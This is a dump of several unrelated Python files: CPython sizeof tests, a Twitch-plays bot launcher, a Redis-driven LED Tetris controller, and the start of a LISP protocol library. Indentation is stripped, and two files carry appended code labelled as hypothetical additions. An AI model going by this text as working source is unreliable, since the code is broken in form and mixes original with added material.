check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn12PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'6P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 32 + 21*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 15*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 32 + 21*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 13*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
main.py
|
from threading import Thread
from ircbot import Bot
from play_game import Game
from queue import MyQ
from locals import *
from gui import Gui
def main():
"""
Creates a queue that keeps track of commands to be entered into the game.
Creates three more objects and spins up a thread for each:
1 - The IRC bot, which monitors the Twitch IRC channel for new actions to queue.
2 - The game thread, which pops entries from the queue if they exist, and runs
them in the game.
3 - The gui thread, which runs a simple (read: ugly) gui that displays the possible
actions and their votes, and the actions in the queue.
TODO: There's no way of stopping all of these threads at once yet;
currently the only option is to close the shell, which is bad. Each thread
needs a condition that watches for Ctrl-C, or something like that (a hedged
sketch of one approach is appended at the end of this file).
"""
queue = MyQ()
bot = Bot(BOT_OWNER, NICK, CHANNEL, SERVER, PORT, AUTH, queue)
bot_thread = Thread(target=bot.run)
bot_thread.start()
game = Game(queue)
game_thread = Thread(target=game.run_game)
game_thread.start()
gui_thread = Thread(target=start_gui, args=(queue,))
gui_thread.start()
def start_gui(queue):
Gui(queue)
if __name__ == '__main__':
main()
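#
# A minimal, hypothetical sketch (not part of the original project) of one way
# to handle the shutdown TODO in main()'s docstring. It assumes Bot, Game, and
# Gui expose no stop hooks, so it marks the worker threads as daemons and
# waits for Ctrl-C in the main thread; daemon threads are terminated when the
# main thread exits. The function name and structure are illustrative only.
#
def main_with_ctrl_c():
    queue = MyQ()
    bot = Bot(BOT_OWNER, NICK, CHANNEL, SERVER, PORT, AUTH, queue)
    game = Game(queue)
    workers = [Thread(target=bot.run, daemon=True),
               Thread(target=game.run_game, daemon=True),
               Thread(target=start_gui, args=(queue,), daemon=True)]
    for worker in workers:
        worker.start()
    try:
        while True:
            # Wake up periodically so KeyboardInterrupt is delivered promptly.
            workers[0].join(timeout=1.0)
    except KeyboardInterrupt:
        print("Ctrl-C received, exiting; daemon threads will be stopped.")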
|
MAIN.py
|
#!/usr/bin/python3
import signal
import threading
from time import sleep
import redis
from features.binaryclock import BinaryClock
from features.mona import Mona
from features.snow import Snow
from field import Field
from highscorelist import *
from painter import RGB_Field_Painter, Led_Matrix_Painter
from features.rainbowclock import Clock
from features.rainbowclock import Rainbowclock
from features.snake_main import Snake_Main
from features.startscreen import Startscreen
from features.tetris import Tetris
running = True
def stophandler(signal, stackframe):
global running
print("Stop Tetris due to kill signal")
running = False
signal.signal(signal.SIGTERM, stophandler)
def control(features: dict, events: dict, subscriptions):
global active
global username
global running
while running:
sleep(0.1)
cmd = get_redis_message(subscriptions)
if cmd in features:
active.stop()
active = features[cmd]
active.start(username)
elif cmd == "start_highscore":
# TODO: implement highscore list display
test = highscorelist_tetris.highscores
print(test)
elif cmd in events:
active.event(events[cmd])
def get_redis_message(subscriptions) -> str:
global username
message = subscriptions.get_message()
if message:
command = message['data']
print(command)
if isinstance(command, (bytes, bytearray)):
command = str(command, "utf-8")
if str(message['channel'], "utf-8") == "username":
# TODO: global variable hack
username = command
return ""
print("Redis command received:", command)
return command
return ""
username = ""
redis_client = redis.StrictRedis(host='localhost', port=6379)
subscriptions = redis_client.pubsub()
subscriptions.subscribe('game_action')
subscriptions.subscribe("username")
field_leds = Field(10, 20)
field_matrix = Field(32, 8)
rgb_field_painter = RGB_Field_Painter()
led_matrix_painter = Led_Matrix_Painter()
highscorelist_tetris = Highscorelist("Tetris")
highscorelist_tetris.load()
highscorelist_snake = Highscorelist("Snake")
highscorelist_snake.load()
rainbowclock = Rainbowclock(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
clock = Clock(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
tetris = Tetris(field_leds, field_matrix, rgb_field_painter, led_matrix_painter, highscorelist_tetris)
snake = Snake_Main(field_leds, field_matrix, rgb_field_painter, led_matrix_painter, highscorelist_snake)
startscreen = Startscreen(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
snow = Snow(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
binary = BinaryClock(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
mona = Mona(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
features = {"start_tetris": tetris,
"tetris_start": tetris,
"start_clock_rainbow": rainbowclock,
"start_clock": clock,
"start_snake": snake,
"start_screen": startscreen,
"start_snow": snow,
"start_binary": binary}
events = {"action_new_block": "new",
"action_turn_left": "rotate left",
"action_turn_right": "rotate right",
"action_move_left": "move left",
"action_move_right": "move right",
"action_soft_down": "move down",
"action_hard_down": "move down",
"action_move_down": "move down",
"action_move_up": "move up",
"action_pause": "pause"}
active = mona
active.start("")
thread_for_control = threading.Thread(target=control, args=(features, events, subscriptions))
thread_for_control.daemon = True
thread_for_control.start()
while running:
active.tick()
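#
# Hypothetical helper (not part of the original program, appended after the
# non-terminating main loop purely for illustration): publishes a command on
# the same Redis channels the control() loop subscribes to, which is handy
# for testing without the real front-end. Assumes a local Redis server on the
# default port; the function and argument names are illustrative only.
#
def publish_test_command(command="start_tetris", player="tester"):
    client = redis.StrictRedis(host='localhost', port=6379)
    client.publish("username", player)      # picked up via the "username" channel
    client.publish("game_action", command)  # picked up via the "game_action" channel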
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, and packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. The first dictionary is indexed by device name and
# the second one holds lisp_interface() values indexed by an instance-id
# string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
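#
# A hypothetical illustration (not from the original sources) of the layout
# described above, assuming device "eth0" carries instance-ID 1000:
#
#   lisp_myinterfaces["eth0"] = lisp_interface("eth0")
#   lisp_iid_to_interface["1000"] = lisp_myinterfaces["eth0"]
#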
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time the g, p, and public-key values are created. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
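#
# A hypothetical illustration (not from the original sources) of the layout
# described above; each value is a 4-slot array indexed by key-id, where
# unused key-ids stay None:
#
#   lisp_crypto_keys_by_nonce[nonce] = [None, <keys for key-id 1>, None, None]
#   lisp_crypto_keys_by_rloc_encap["10.0.0.2:4341"] = [None, <key-id 1>, None, None]
#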
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag indicates that when a map-cache
# entry is created or updated, we write specific information to, say, a
# Broadcom chip that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. The key is
# the hostname sent in an Info-Request; the value is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests.
#
lisp_last_map_request_sent = None
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll hash the first long of an ICMP echo-request and
# echo-reply for testing purposes, to show per-packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# an EID target they are requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
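#
# A hypothetical example entry (not from the original sources) matching the
# format described above:
#
#   lisp_pubsub_cache["[1000]10.1.0.0/16"] = { "192.0.2.1" : <pubsub state> }
#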
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends are
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
#
# Used to store NAT translated address state in an RTR when an ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error processing called from lisp_rtr_data_plane(), then it
# can return a partially filled LISP-Trace packet to the ltr client that
# sits behind a NAT device.
#
# Dictionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_TEST_MR_INTERVAL = 60 # In units of seconds
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = 5 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
#LISP_RLOC_PROBE_INTERVAL = 60 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10 # In units of seconds
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian_kali
#
# Return True if this system is running Kali Linux.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Alpine Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is running on an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this system is running Linux (e.g., Ubuntu or Fedora).
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_process_logfile
#
# Check to see if the logfile exists. If not, either it is startup time and
# one needs to be created, or another procedure rotated the file out of the
# directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
